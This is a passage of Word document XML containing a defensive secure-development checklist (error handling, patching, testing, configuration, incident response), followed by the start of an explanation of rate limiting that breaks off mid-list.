    <w:p w14:paraId="7DB55BF2"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6. Error Handling and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31955271" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Detailed Error Messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Do not expose detailed error messages to end-users. Use generic error messages and log detailed errors internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488898E2" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="550"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centralized Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement centralized logging for security events and incidents. Ensure logs are protected and monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DFC28"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7. Regular Updates and Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F4D25" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Keep Software Updated</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly update all software components, libraries, and dependencies to address known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5F4A46" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="551"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Patch Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Apply security patches promptly to prevent exploitation of known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB1445D"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8. Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A984A9A" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly perform penetration testing to identify and address potential security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72ACDE" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="552"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Static and Dynamic Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use static analysis tools to identify vulnerabilities in code and dynamic analysis tools to test running applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E9FF5"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9. Secure Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B55A5" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Least Privilege Principle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure systems and applications with the least privilege necessary to reduce potential attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381540A" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Defaults</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use secure default settings and avoid exposing unnecessary services or ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381C6D8" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="553"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Configuration Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use configuration management tools to enforce and maintain secure configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B623B0"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10. Secure Development Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83DAE6" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Conduct regular security reviews and threat modeling during the development lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7179BB" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Development Training</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provide security training for developers to raise awareness about secure coding practices and common vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57BC0B" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Code Reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement peer code reviews to catch security issues and improve code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D5EC47"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11. User Awareness and Education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D64A6C" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Training</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Educate users about security best practices, such as recognizing phishing attempts and using strong passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1B08E" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="555"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Develop and enforce security policies for users and administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F0E94"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12. Application Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF24A6" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Environment Separation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Separate development, staging, and production environments to minimize risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DC8D4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement security controls such as firewalls and intrusion detection systems (IDS) in the deployment environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE1C4D" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Container Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If using containers, follow container security best practices (e.g., scanning for vulnerabilities, using minimal base images).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03805AB1"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13. Incident Response and Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23EBED" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Incident Response Plan</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Develop and maintain an incident response plan to address and manage security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EC2B4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="557"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disaster Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement a disaster recovery plan to ensure business continuity in case of a major security breach or other critical incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD1607" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC5AFF1" w14:textId="0830E76A" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc178383342"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is rate limiting and helmet package for securing header</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="5BE11CB7"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Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617746B" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique used to control the amount of incoming or outgoing traffic to a network or server within a given period. Its primary purpose is to prevent abuse, reduce the risk of denial-of-service (DoS) attacks, and ensure fair usage of resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA0D4E"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How Rate Limiting Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D3A69" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Request Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Each incoming request is tracked based on predefined criteria such as IP address, user account, or API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF69626" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Quota Enforcement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A limit is set on the number of requests that can be made within a specific time frame (e.g., 100 requests per minute).</w:t>
      </w:r>
    </w:p>
